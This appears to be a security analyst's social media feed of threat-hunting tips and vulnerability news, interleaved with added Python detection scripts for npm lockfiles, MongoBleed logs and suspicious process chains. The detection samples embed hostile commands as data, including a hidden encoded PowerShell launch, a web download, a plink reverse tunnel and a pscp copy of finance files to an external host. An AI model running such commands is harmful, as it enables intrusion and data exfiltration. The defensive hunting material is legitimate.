Joined September 2017
🛡️ Detection Engineering Tip A good detection should answer: 1️⃣ What attacker behavior am I detecting? 2️⃣ What ATT&CK technique maps to it? 3️⃣ How can an attacker evade it? 4️⃣ What telemetry validates it? Detection logic > Query syntax. #DetectionEngineering #ThreatHunting
More than 30 Red Hat npm packages were recently compromised with malware designed to steal credentials from developer environments. Reminder: Trust ≠ Verification. Monitor: • Unexpected package updates • CI/CD credential access • New outbound connections from build systems
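The "unexpected package updates" check from the post above, as an added example that is not code from the post or from Red Hat: it diffs two package-lock.json snapshots (the "before" lockfile committed in the repo against the one the build just produced) and reports the changes a compromised package typically shows up as. The lockfiles are constructed in lockfileVersion 3 layout (a top-level "packages" map keyed by "node_modules/<name>"), the package names and integrity hashes are made up, and TRUSTED_REGISTRY_HOSTS is an assumed policy.

```python
"""Diff two package-lock.json snapshots for the changes a compromised package
would show up as: unexpected version bumps, a changed tarball for the same
version, a newly added install script, or a tarball resolved from outside the
registry.

Added example, not code from the post or from Red Hat. Lockfiles below are
constructed (lockfileVersion 3 layout); names, hashes and the trusted-host
policy are assumptions.
"""
import json
from urllib.parse import urlparse

TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}   # assumed policy for this project


def load_packages(lock_text):
    """{path: entry} for every dependency; the root entry "" is skipped."""
    data = json.loads(lock_text)
    return {path: entry for path, entry in data.get("packages", {}).items() if path}


def diff_lockfiles(old_text, new_text):
    """Return [(finding, path, detail), ...] comparing old -> new."""
    old, new = load_packages(old_text), load_packages(new_text)
    findings = []
    for path in sorted(set(old) | set(new)):
        o, n = old.get(path), new.get(path)
        if o is None:
            findings.append(("added", path, n.get("version")))
        elif n is None:
            findings.append(("removed", path, o.get("version")))
            continue
        elif o.get("version") != n.get("version"):
            findings.append(("version_changed", path, f"{o.get('version')} -> {n.get('version')}"))
        elif o.get("integrity") != n.get("integrity"):
            # Same version, different tarball hash: republished or tampered artifact.
            findings.append(("integrity_changed_same_version", path, n.get("integrity")))
        host = urlparse(n.get("resolved") or "").hostname
        if host and host not in TRUSTED_REGISTRY_HOSTS:
            findings.append(("untrusted_source", path, n.get("resolved")))
        if n.get("hasInstallScript") and not (o or {}).get("hasInstallScript"):
            # npm runs preinstall/install/postinstall hooks with the developer's credentials.
            findings.append(("new_install_script", path, n.get("version")))
    return findings


def _entry(name, version, integrity, host="registry.npmjs.org", **extra):
    """Build one constructed lockfile entry."""
    return {"version": version, "integrity": integrity,
            "resolved": f"https://{host}/{name}/-/{name.split('/')[-1]}-{version}.tgz", **extra}


# Constructed lockfiles (not real packages).
OLD_LOCK = json.dumps({"name": "demo-app", "lockfileVersion": 3, "packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    "node_modules/@acme/cli-utils": _entry("@acme/cli-utils", "2.1.0", "sha512-AAAA"),
    "node_modules/ini": _entry("ini", "4.1.1", "sha512-BBBB"),
    "node_modules/lodash": _entry("lodash", "4.17.21", "sha512-CCCC"),
    "node_modules/old-dep": _entry("old-dep", "0.9.0", "sha512-DDDD"),
}})
NEW_LOCK = json.dumps({"name": "demo-app", "lockfileVersion": 3, "packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    # bumped a patch version and now carries an install hook
    "node_modules/@acme/cli-utils": _entry("@acme/cli-utils", "2.1.1", "sha512-EEEE", hasInstallScript=True),
    # same version, different tarball
    "node_modules/ini": _entry("ini", "4.1.1", "sha512-FFFF"),
    "node_modules/lodash": _entry("lodash", "4.17.21", "sha512-CCCC"),
    # new dependency pulled from a non-registry host
    "node_modules/colors-helper": _entry("colors-helper", "1.0.2", "sha512-GGGG", host="npm.example-mirror.net"),
}})

if __name__ == "__main__":
    for finding, path, detail in diff_lockfiles(OLD_LOCK, NEW_LOCK):
        print(f"{finding:32} {path:36} {detail}")
```

Run it as a CI gate between the committed lockfile and the one `npm install` just wrote; any finding other than an expected version bump should fail the build, and a new install script or a changed tarball for an unchanged version deserves a human look before the job gets credentials.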
🎯 Threat Hunting Idea Hunt for: • Office → PowerShell • Browser → cmd.exe • Teams → PowerShell These parent-child process relationships continue to be common indicators of phishing-driven initial access and malware execution.
What suspicious process chains are you hunting this week? #ThreatHunting #ThreatHunt #ThreatIntel #DetectionEngineering #BlueTeam #Cybersecurity
CISA has warned that attackers are actively exploiting SolarWinds Serv-U (CVE-2026-28318), allowing unauthenticated attackers to crash vulnerable servers through crafted requests. If Serv-U is exposed externally, prioritize patching and monitor for abnormal POST requests.
🚀 Back on X. I'm a CSIRT L3 Detection Analyst securing IT & OT environments. Looking to connect with fellow cybersecurity professionals, researchers, and defenders. Let's learn, share, & grow together. 🤝 #CyberSecurity #ITSecurity #OTSecurity #SOC #ThreatHunting #DFIR #CSIRT
Aniket Chavan retweeted
WAF Bypass Discovered - Akamai & Cloudflare: 🙌🏻 A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare. #infosec #cybersec #bugbountytips
Aniket Chavan retweeted
I wrote a tool to detect MongoBleed exploitation in MongoDB logs 🩸 The detection logic is based on @eric_capuano's excellent research: the exploit makes thousands of connections but never sends client metadata. Legit drivers always do. github.com/Neo23x0/mongoblee…
Features:
- Pure bash/jq/awk - no agents, runs via SSH or on forensic copies
- Streams large logs without loading into memory
- Handles compressed .gz rotated logs
- IPv4 & IPv6 support
- Configurable thresholds
- Risk levels: HIGH/MEDIUM/LOW/INFO
- A Python-based wrapper that takes a host list as input and runs the script on a set of remote systems
The subfolder ./example-logs contains a Mongod.log of an exploited system
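The detection idea from the post above, written out as an added Python example that is not Neo23x0's tool: count, per source IP, how many TCP connections mongod accepted and how many of those ever completed a driver handshake, then rank sources that connect hundreds of times without ever sending client metadata. It assumes mongod 4.4+ structured JSON logging, where the accepted connection is logged with msg "Connection accepted" (log id 22943) and the handshake with msg "client metadata" (log id 51800); the risk thresholds are made-up defaults, and every log line is constructed here, not taken from the tool's example-logs folder.

```python
"""Flag MongoBleed-style clients in mongod structured (JSON) logs.

Added example, not Neo23x0's tool. Assumptions: mongod 4.4+ JSON logging
(msg "Connection accepted" / id 22943 for the TCP accept, msg "client metadata"
/ id 51800 for the driver handshake), made-up thresholds, constructed log lines.
"""
import gzip
import json
from collections import defaultdict

LEVELS = ("HIGH", "MEDIUM", "LOW", "INFO")


def remote_ip(remote):
    """Strip the port: '203.0.113.7:51234' -> '203.0.113.7',
    '[2001:db8::1]:443' or '::1:443' -> the bare IPv6 address."""
    host = remote.rsplit(":", 1)[0] if ":" in remote else remote
    return host.strip("[]")


def iter_log_lines(paths):
    """Stream plain or .gz-rotated mongod logs line by line (no whole-file reads)."""
    for path in paths:
        opener = gzip.open if str(path).endswith(".gz") else open
        with opener(path, "rt", encoding="utf-8", errors="replace") as fh:
            yield from fh


def analyze(lines):
    """Per source IP: accepted connections, how many sent client metadata, first/last seen."""
    stats = defaultdict(lambda: {"accepted": 0, "metadata": 0, "first": None, "last": None})
    for line in lines:
        try:
            ev = json.loads(line)
        except ValueError:
            continue                      # pre-4.4 text format or truncated line
        if not isinstance(ev, dict) or ev.get("c") != "NETWORK":
            continue
        remote = (ev.get("attr") or {}).get("remote")
        if not remote:
            continue
        s = stats[remote_ip(remote)]
        ts = (ev.get("t") or {}).get("$date")
        if ev.get("msg") == "Connection accepted":
            s["accepted"] += 1
            s["first"] = s["first"] or ts
            s["last"] = ts or s["last"]
        elif ev.get("msg") == "client metadata":
            s["metadata"] += 1
    return dict(stats)


def risk(accepted, metadata, high=500, medium=50):
    """Many connections that never identified a driver is the exploit pattern;
    a handful of silent connections (load-balancer TCP checks) is only LOW."""
    if metadata == 0 and accepted >= high:
        return "HIGH"
    if metadata == 0 and accepted >= medium:
        return "MEDIUM"
    if metadata < accepted:
        return "LOW"
    return "INFO"


def report(stats, **thresholds):
    """[(level, ip, accepted, metadata, first, last), ...] ordered HIGH first."""
    rows = [(risk(s["accepted"], s["metadata"], **thresholds), ip, s["accepted"],
             s["metadata"], s["first"], s["last"]) for ip, s in stats.items()]
    return sorted(rows, key=lambda r: (LEVELS.index(r[0]), -r[2]))


def _line(ts, msg, log_id, remote, **attr):
    """Build one constructed mongod JSON log line."""
    ev = {"t": {"$date": ts}, "s": "I", "c": "NETWORK", "id": log_id,
          "ctx": "listener", "msg": msg, "attr": {"remote": remote, **attr}}
    return json.dumps(ev) + "\n"


SAMPLE_LINES = []
# Application server: five pooled connections, each announcing its driver.
for i in range(5):
    SAMPLE_LINES.append(_line(f"2025-12-26T10:00:{i:02d}.000+00:00", "Connection accepted",
                              22943, f"10.0.0.5:4{i}000", connectionId=i))
    SAMPLE_LINES.append(_line(f"2025-12-26T10:00:{i:02d}.050+00:00", "client metadata",
                              51800, f"10.0.0.5:4{i}000",
                              doc={"driver": {"name": "PyMongo", "version": "4.6.0"}}))
# Load-balancer health checks over IPv6: TCP connect, no handshake.
for i in range(3):
    SAMPLE_LINES.append(_line(f"2025-12-26T10:01:{i:02d}.000+00:00", "Connection accepted",
                              22943, f"[2001:db8::10]:5{i}000"))
# Exploit pattern: 600 connections from one host, not one with client metadata.
for i in range(600):
    SAMPLE_LINES.append(_line(f"2025-12-26T10:{5 + i // 60:02d}:{i % 60:02d}.000+00:00",
                              "Connection accepted", 22943, f"203.0.113.7:{20000 + i}"))
SAMPLE_LINES.append("2025-12-26T10:20:00.000+0000 I NETWORK legacy text line\n")

if __name__ == "__main__":
    for row in report(analyze(SAMPLE_LINES)):
        print("%-6s %-16s accepted=%-4d metadata=%-3d %s .. %s" % row)
```

On a real host, replace SAMPLE_LINES with `iter_log_lines(sorted(glob("/var/log/mongodb/mongod.log*")))` so rotated .gz files are read in order; tune `high`/`medium` to the instance's normal connection volume, and treat a HIGH source's first/last timestamps as the window in which every credential and token that was in mongod's heap should be considered exposed.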
Aniket Chavan retweeted
MongoBleed (CVE-2025-14847) is basically Heartbleed for MongoDB - unauthenticated memory disclosure - public POC, trivial to exploit - leaks creds, tokens, cloud keys straight from RAM - huge exposed surface on the internet Good writeups and technical details here: doublepulsar.com/merry-chris… ox.security/blog/attackers-c… blog.ecapuano.com/p/hunting-… Patch fast, rotate secrets, and assume exposed instances were scanned(!)
Aniket Chavan retweeted
27 Dec 2025
🚨 A critical vulnerability in MongoDB (CVE-2025-14847) allows unauthenticated attackers to remotely leak sensitive data from MongoDB server memory. A MongoDB honeypot intel stream has now been added to Defused TF and is available for subscription 🍯 👉console.defusedcyber.com/sig…
Aniket Chavan retweeted
27 Dec 2025
🚨 MongoBleed (CVE-2025-14847) MongoDB w/ zlib enabled (default) may leak uninitialized heap memory to unauthenticated attackers, risking credentials & tokens. 📌 Censys sees 87K potentially vulnerable instances. ✅ Patch: 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, 4.4.30 🔗 hubs.ly/Q03Z4_GS0 #MongoDB #CVE202514847
Aniket Chavan retweeted
🚨 Hackers Using PuTTY for Both Lateral Movement and Data Exfiltration Source: cybersecuritynews.com/putty-… Hackers are increasingly abusing the popular PuTTY SSH client for stealthy lateral movement and data exfiltration in compromised networks, leaving subtle forensic traces that investigators can exploit. Threat actors favor PuTTY, a legitimate tool for secure remote access, due to its “living off the land” nature, blending malicious activity with normal admin tasks. Attackers execute PuTTY binaries like plink.exe or pscp.exe to hop between systems via SSH tunnels and siphon sensitive files without deploying custom malware. #cybersecuritynews
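The two process hunts on this page, the Office/Browser/Teams → shell parent-child chains from the threat-hunting post and the plink.exe/pscp.exe lateral-movement and exfiltration pattern from the PuTTY post, share one piece of telemetry: process-creation events. The added example below (not code from either post) runs both hunts over that telemetry. It assumes newline-delimited JSON events with Sysmon Event ID 1-style field names (Computer, ParentImage, Image, CommandLine); every event is constructed, not real telemetry, and the extra parent and child names beyond the three chains in the post are common equivalents added here.

```python
"""Hunt for suspicious parent->child process chains and PuTTY (plink/pscp)
abuse in process-creation telemetry.

Added example for the two posts above; not code from either post. Events are
assumed to be NDJSON with Sysmon Event ID 1-style fields (Computer,
ParentImage, Image, CommandLine); all sample events are constructed.
"""
import json
from pathlib import PureWindowsPath

# Parent -> child pairs from the hunting post, with common equivalents added.
# Only the lower-cased file name is compared, so winword.exe launched from an
# unusual directory still matches.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
TEAMS = {"teams.exe", "ms-teams.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
          "cscript.exe", "mshta.exe"}
CHAIN_RULES = [
    ("office_to_shell", OFFICE, SHELLS),
    ("browser_to_shell", BROWSERS, SHELLS),
    ("teams_to_shell", TEAMS, SHELLS),
]

# PuTTY command-line tools; -L/-R/-D set up SSH port forwarding (case matters:
# lower-case -l is the login name, so arguments are not lower-cased).
PUTTY_TOOLS = {"plink.exe", "pscp.exe", "psftp.exe"}
TUNNEL_FLAGS = {"-L", "-R", "-D"}


def base_name(path):
    """Lower-cased file name of a Windows path ('' when the field is missing)."""
    return PureWindowsPath(path or "").name.lower()


def check_event(ev):
    """Return [(rule, detail), ...] for one process-creation event."""
    parent = base_name(ev.get("ParentImage"))
    child = base_name(ev.get("Image"))
    args = (ev.get("CommandLine") or "").split()
    findings = []
    for rule, parents, children in CHAIN_RULES:
        if parent in parents and child in children:
            findings.append((rule, f"{parent} -> {child}"))
    if child in PUTTY_TOOLS:
        flags = sorted(a for a in args if a in TUNNEL_FLAGS)
        if flags:
            findings.append(("putty_tunnel", f"{child} port forwarding {' '.join(flags)}"))
        elif child in {"pscp.exe", "psftp.exe"}:
            findings.append(("putty_transfer", f"{child} file transfer"))
        else:
            findings.append(("putty_remote_exec", f"{child} remote session"))
    return findings


def hunt(lines):
    """Run every rule over NDJSON events; returns [(rule, detail, host), ...].
    Malformed lines are skipped rather than aborting the whole hunt."""
    hits = []
    for line in lines:
        try:
            ev = json.loads(line)
        except ValueError:
            continue
        if not isinstance(ev, dict):
            continue
        for rule, detail in check_event(ev):
            hits.append((rule, detail, ev.get("Computer", "?")))
    return hits


# Constructed sample telemetry (raw strings: JSON needs doubled backslashes).
SAMPLE_EVENTS = [
    r'{"Computer":"WS01","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell -nop -w hidden -enc SQBFAFgA"}',
    r'{"Computer":"WS02","ParentImage":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c whoami"}',
    r'{"Computer":"WS03","ParentImage":"C:\\Users\\a\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe","Image":"C:\\Program Files\\PowerShell\\7\\pwsh.exe","CommandLine":"pwsh -c iwr http://203.0.113.9/x"}',
    r'{"Computer":"WS04","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell"}',
    r'{"Computer":"SRV01","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Tools\\plink.exe","CommandLine":"plink.exe -R 3389:127.0.0.1:3389 ops@203.0.113.10 -pw x -N"}',
    r'{"Computer":"SRV01","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Tools\\pscp.exe","CommandLine":"pscp.exe -r C:\\Finance\\Q4 ops@203.0.113.10:/tmp/"}',
    "not json at all",
]

if __name__ == "__main__":
    for rule, detail, host in hunt(SAMPLE_EVENTS):
        print(f"{host:6} {rule:18} {detail}")
```

The explorer.exe → powershell.exe event is deliberately left unflagged: an admin opening a console is the baseline the chain rules have to stay quiet on. The plink rule keys on the port-forwarding flags rather than on the binary alone, because the `-R` reverse tunnel to an external host is what turns an ordinary SSH client into the pivot the PuTTY post describes; a renamed copy of plink.exe evades the file-name check, so pair it with hash- or signer-based matching in production.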
Aniket Chavan retweeted
18 Dec 2025
🏛️🧠 Strong governance is key to cyber resilience. Our updated Cross-Sector Cybersecurity Performance Goals now include a governance component—emphasizing leadership accountability, risk management, & integration of #cybersecurity in operations. More info: cisa.gov/cross-sector-cybers…
Aniket Chavan retweeted
18 Dec 2025
Cyber AI Profile - nvlpubs.nist.gov/nistpubs/ir… by @NIST NIST’s preliminary draft Cyber AI Profile can help organizations strategically adopt AI while addressing and prioritizing cybersecurity risks stemming from its advancements. The Cyber AI Profile addresses the following Focus Areas: - Securing AI System Components (Secure) - Conducting AI-Enabled Cyber Defense (Defend) - Thwarting AI-enabled Cyber Attacks (Thwart) Authors: @KonnectedKat, Barbara Cuthill, Marissa Dotter, Michael Garris, Ishika Khemani, Bronwyn Patrick, Noah Schiro, Julie Nethery Snyder, Mohammad Zarei – @NIST, @NISTcyber, @MITREcorp
Aniket Chavan retweeted
🛑 WARNING: CVE-2025-20393 is rated 10.0, with no patch available. Cisco confirmed active exploitation of an AsyncOS zero-day by a China-linked APT. The flaw allows root-level command execution on affected email security appliances and enables attackers to establish persistence. 🔗 Details and mitigations → thehackernews.com/2025/12/ci…
Aniket Chavan retweeted
25 Sep 2025
🚨 Cyber threat actors are exploiting newly identified zero-day vulnerabilities in Cisco Adaptive Security Appliances via web services, posing significant risk. Federal agencies must act immediately and follow the guidance in Emergency Directive 25-03. 🔗 go.dhs.gov/iAK